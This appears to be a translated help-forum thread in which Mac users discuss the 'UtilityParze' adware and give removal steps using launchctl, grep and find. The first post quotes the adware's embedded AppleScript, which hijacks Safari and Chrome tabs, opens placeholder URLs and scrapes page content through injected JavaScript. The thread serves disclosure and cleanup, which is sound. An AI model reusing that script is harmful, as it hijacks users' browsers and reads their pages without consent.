Estou usando um Macbook Air com OS X Catalina.
Hoje, quando abri o Safari, uma caixa de diálogo de segurança apareceu perguntando se o UtilityParze pode acessar o Safari. Não encontrei nenhuma menção a esse aplicativo online até agora, mas encontrei um executável /Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParzeem meu sistema de arquivos.
Na maior parte não é legível por humanos, mas aqui está um script incorporado:
if application "Safari" is running then
run script "tell application \"Safari\" to return URL of front document"
end if
if application "Safari" is running then
tell application id (id of application "Safari") to open location "[URL_TO_OPEN]"
tell application id (id of application "Safari") to activate
delay 5.0
end if
if application "Safari" is running then
run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window
tell application id (id of application \"Safari\") to open location \"[UA_URL]\"
tell application id (id of application \"Safari\") to set the content to the text of document 1
repeat until length of (content as string) is not 0
delay 0.2
tell application id (id of application \"Safari\") to set the content to the text of document 1
end repeat
tell front window of application \"Safari\" to close last tab
tell front window of application \"Safari\" to set current tab to tab activeIndex
return content as string"
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\" to get URL of active tab of first window"
end if
if application "Google Chrome" is running then
tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]"
tell application id (id of application "Google Chrome") to activate
delay 5.0
end if
if application "Google Chrome" is running then
tell application "Google Chrome"
open location "[UA_URL]"
end tell
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\"
set the activeUrl to get URL of front window's active tab
open location \"[UA_URL]\"
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
repeat until length of (content as string) is not 0
delay 0.2
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
end repeat
tell front window's active tab to close
set tabIndex to 0
repeat with currentTab in (tabs of (front window))
set tabIndex to tabIndex + 1
if URL of currentTab is activeUrl then
set (active tab index of (front window)) to tabIndex
exit repeat
end if
end repeat
return content as string
end tell"
end if
Alguém já ouviu falar desse programa? Até agora, apenas neguei o acesso, mas não o excluí. Acho que é algo irritante que inicialmente redireciona para uma página quando tento abrir um navegador.
Você já tentou executar, por exemplo
launchctl list | grep Utility, em um Terminal para ver se um agente de inicialização está sendo executado, o que, por sua vez, mantém o aplicativo em execução? Nesse caso, você provavelmente deve executarlaunchctl unload com.UtilityParze(ou qualquer que seja o identificador/nome que aparece ao listar anteriormente) para garantirlaunchdque não tente manter o aplicativo ativo e, em seguida, exclua todos os arquivos relacionados.launchctl list com.UtilityParzedeve dar uma dica sobre o que/onde esses arquivos estão.Os três locais mais prováveis para as definições .plist desse agente de inicialização são:
/Library/LaunchAgents/Library/LaunchDaemons/Users/markus/Library/LaunchAgentsProcure em todas essas pastas por
com.UtilityParze.plist. Mas eles podem usar um nome furtivo, então inspecionar vialaunchctlé provavelmente melhor. Outra opção é grep para o nome suspeito em todas as definições .plist, algo como:grep -R Parze /Library/LaunchAgentsgrep -R Parze ~/Library/LaunchAgentssudo grep -R Parze /Library/LaunchDaemonsOs arquivos de definição do agente de inicialização devem incluir o caminho para um executável para fazer qualquer coisa e se o criador do malware não espalhou os arquivos em muitos locais, todos os arquivos ofensivos provavelmente estão em uma pasta em algum lugar junto com o executável. Encontre o executável e provavelmente encontrará todos os outros arquivos para excluir também. Mas certifique-se de descarregar o agente primeiro.
Ainda outra maneira de detectar os arquivos de malware está em execução
findem todas as suas bibliotecas:sudo find /Library -iname Parzefind ~/Library -iname ParzeTive um problema semelhante ao encontrar arquivos bizarros na pasta LaunchAgents e em alguns outros locais na pasta Library. UtilityData.plist, UtilityParze.plist e uma longa lista de arquivos trojan VSearch (MacInstallPall e mais alguns arquivos MacInstall*%&+@ estavam entre eles. De acordo com Malwarebytes, eles eram malwares, precisavam ser colocados em quarentena. Primeiro coloquei em quarentena e depois excluí eles.
Acabei de (domingo, 12 de janeiro de 2020, por volta das 9h52) um prompt "Utilityparve" semelhante apareceu no Mojave solicitando permissão para acessar o Google Chrome. Eu não permiti o acesso.
No passado, recebi solicitações misteriosas semelhantes de acesso ao navegador que estavam conectadas a um adware que tive que limpar manualmente do sistema.
"Macperformance" é um exemplo que parece encontrar repetidamente seu caminho para um local muito semelhante na "Biblioteca" do usuário ativo. Não sei se existe uma ligação direta entre "UtilityParve" e "Macperformance", mas neste momento ambos estão presentes na minha Biblioteca.
"Utilityparve está localizado na pasta "UpdatesMac", enquanto "Macperformance" está localizado na pasta "UpdateMac".
Com base na falta de uma descrição de sua função online, excluirei "Utilityparve" e "Macperformance", que são considerados adware.
Um aplicativo chamado 'Easyfind' pode pesquisar o arquivo com muita facilidade. Acabei de pesquisar 'UtilityParze' e, em seguida, produzi 4 resultados. Eu apago todos de uma vez.